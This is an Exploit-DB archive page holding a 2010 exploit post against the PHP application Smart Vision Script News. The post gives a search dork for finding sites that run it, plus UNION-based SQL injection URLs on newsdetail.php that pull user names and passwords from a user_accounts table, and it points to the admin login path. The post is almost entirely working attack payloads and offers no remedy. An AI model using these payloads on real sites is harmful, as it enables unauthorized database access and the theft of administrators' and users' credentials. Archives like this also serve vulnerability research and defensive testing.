Smart Vision Script News - 'newsdetail.php' SQL Injection (1)

EDB-ID:

10977

CVE:

N/A

EDB Verified:

Author:

Err0R

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-01-03

Vulnerable App:

# Exploit Title: Smart Vsion Script News (newsdetail) SQL Injection Vulnerability
# Software Link: www.esmart-vision.com<http://www.esmart-vision.com/>


============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com<http://www.esmart-vision.com/>
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http:http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#============================#

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services